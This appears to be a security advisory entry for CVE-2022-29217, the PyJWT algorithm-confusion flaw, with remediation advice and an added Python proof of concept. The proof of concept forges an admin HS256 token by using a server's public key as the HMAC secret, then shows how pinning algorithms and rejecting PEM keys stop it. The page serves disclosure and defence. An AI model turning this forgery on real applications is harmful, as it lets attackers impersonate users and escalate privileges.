PT-2022-7130 · Pypi+4 · Pyjwt+4

Emmharnuherl

·

Published

2022-05-12

·

Updated

2025-04-11

·

CVE-2022-29217

CVSS v2.0

7.8

High

Vector AV:N/AC:L/Au:N/C:N/I:C/A:N
Name of the Vulnerable Software and Affected Versions PyJWT versions prior to 2.4.0
Description The issue is an algorithm (key) confusion weakness in PyJWT, the Python implementation of JWT. Before version 2.4.0 the library did not restrict which key formats could be used as an HMAC secret, so a token signed with an HMAC algorithm (for example HS256) could be verified against key material that the application intended for an asymmetric algorithm such as RS256. Because an RSA or EC public key is not secret, a remote attacker who obtains it can sign a token with it as the HMAC key and have that token accepted, compromising the integrity of the data the token carries. PyJWT supports multiple signing algorithms and requires the application to state which ones it accepts; an application that passes jwt.algorithms.get_default_algorithms() (i.e. every algorithm the library knows) to decode() is exposed to this attack. The estimated number of potentially affected devices is not specified.
Recommendations For versions prior to 2.4.0, upgrade to v2.4.0, which refuses to use PEM/SSH public key material as an HMAC secret. As a temporary workaround, always be explicit about the algorithms that are accepted and expected when decoding: pass an algorithms list that contains only the algorithm(s) the application actually signs with, and never the full default list.
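The following is an added, self-contained illustration of the confusion described above; it is not code from the advisory or from the PyJWT project. It models the relevant part of the decode logic with the standard library only (base64, hmac, json), so it runs without PyJWT or the cryptography package installed. The PEM block SERVER_PUBLIC_KEY_PEM is a constructed placeholder, not a real key: the forgery only needs the bytes of the public key, so it does not have to parse. Function names (decode_vulnerable, decode_hardened, forge_with_public_key) are invented for the demo; only HS256 is actually computed, and the asymmetric branch raises NotImplementedError because real RSA/EC verification is outside what this example needs to show.

```python
"""Algorithm-confusion demo for the PyJWT < 2.4.0 weakness (constructed example)."""
import base64
import hashlib
import hmac
import json

# Stand-in for what a verifier gets when it hands every algorithm PyJWT knows
# to decode() instead of pinning the expected one.
ALL_ALGORITHMS = ["none", "HS256", "HS384", "HS512", "RS256", "RS384", "RS512",
                  "ES256", "PS256"]

# Constructed placeholder for the server's RSA public key. The attack uses the
# PEM bytes as an HMAC secret, so it never has to be a real key.
SERVER_PUBLIC_KEY_PEM = (
    "-----BEGIN PUBLIC KEY-----\n"
    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAexample\n"
    "-----END PUBLIC KEY-----\n"
)

# Prefixes that identify public key material; an HMAC secret should never
# look like this (PyJWT 2.4.0 rejects such keys for HMAC algorithms).
PEM_PUBLIC_KEY_MARKERS = (
    "-----BEGIN PUBLIC KEY-----",
    "-----BEGIN RSA PUBLIC KEY-----",
    "-----BEGIN CERTIFICATE-----",
    "ssh-rsa",
)


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, key: str) -> str:
    """Produce a compact JWS with alg=HS256 over the given payload."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (_b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + _b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(key.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def _split(token: str):
    head, body, sig = token.split(".")
    return (json.loads(_b64url_decode(head)), json.loads(_b64url_decode(body)),
            (head + "." + body).encode(), _b64url_decode(sig))


def _hmac_ok(signing_input: bytes, key: str, sig: bytes) -> bool:
    expected = hmac.new(key.encode(), signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)


def decode_vulnerable(token: str, key: str, algorithms: list) -> dict:
    """Models the pre-2.4.0 behaviour when called with the full default list:
    the header's alg is trusted as long as it appears in the list, and the same
    key material (here, the public key PEM) is fed to whichever algorithm the
    attacker named."""
    header, payload, signing_input, sig = _split(token)
    alg = header.get("alg")
    if alg not in algorithms:
        raise ValueError("algorithm not allowed")
    if alg == "HS256":
        if not _hmac_ok(signing_input, key, sig):
            raise ValueError("bad signature")
        return payload
    raise NotImplementedError("RSA/EC verification is outside this demo")


def decode_hardened(token: str, key: str, algorithms: list) -> dict:
    """Two independent defences: an explicit allow-list chosen by the caller,
    and a refusal to use public key material as an HMAC secret."""
    header, payload, signing_input, sig = _split(token)
    alg = header.get("alg")
    if alg not in algorithms:
        raise ValueError("algorithm %r is not in the explicit allow-list" % alg)
    if alg.startswith("HS"):
        if key.strip().startswith(PEM_PUBLIC_KEY_MARKERS):
            raise ValueError("public key material must not be used as an HMAC secret")
        if alg != "HS256" or not _hmac_ok(signing_input, key, sig):
            raise ValueError("bad signature")
        return payload
    raise NotImplementedError("RSA/EC verification is outside this demo")


def forge_with_public_key(payload: dict) -> str:
    """Attacker side: sign an arbitrary payload with HS256, using the bytes of
    the server's (public, hence known) key as the HMAC secret."""
    return sign_hs256(payload, SERVER_PUBLIC_KEY_PEM)


def rejects(decode, *args) -> bool:
    """True if the given decoder raises ValueError for these arguments."""
    try:
        decode(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    forged = forge_with_public_key({"sub": "admin", "role": "admin"})
    print("vulnerable accepts forged token:",
          decode_vulnerable(forged, SERVER_PUBLIC_KEY_PEM, ALL_ALGORITHMS))
    print("pinned RS256 rejects it:", rejects(decode_hardened, forged, SERVER_PUBLIC_KEY_PEM, ["RS256"]))
    print("PEM-as-HMAC check rejects it:", rejects(decode_hardened, forged, SERVER_PUBLIC_KEY_PEM, ALL_ALGORITHMS))
```

The server in this scenario signs with its RSA private key and verifies with the PEM public key; the attacker never touches the private key. The forged token is accepted by decode_vulnerable only because the list passed in contains HS256 alongside RS256, which is exactly what handing get_default_algorithms() to decode() does. Pinning algorithms=["RS256"] at the call site defeats the attack on any PyJWT version, and the 2.4.0 key-format check catches the remaining case where an application still passes an over-broad list.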

Exploit

Fix

Weakness Enumeration

Use of a Broken Cryptographic Algorithm

Related Identifiers

AZL-9852
BDU:2023-07829
CVE-2022-29217
GHSA-FFQJ-6FQR-9H24
MGASA-2022-0244
OESA-2022-1710
OPENSUSE-SU-2022_2402-1
OPENSUSE-SU-2024:12139-1
OPENSUSE-SU-2025:14987-1
PYSEC-2022-202
SUSE-SU-2022:2401-1
SUSE-SU-2022:2402-1
SUSE-SU-2022:2403-1
SUSE-SU-2022:3545-1
SUSE-SU-2022_2401-1
SUSE-SU-2022_2402-1
SUSE-SU-2022_2403-1
SUSE-SU-2022_3545-1
SUSE-SU-2023:0794-1
SUSE-SU-2023_0794-1
USN-5526-1
USN-5526-2

Affected Products

Linuxmint
Pyjwt
Red Os
Suse
Ubuntu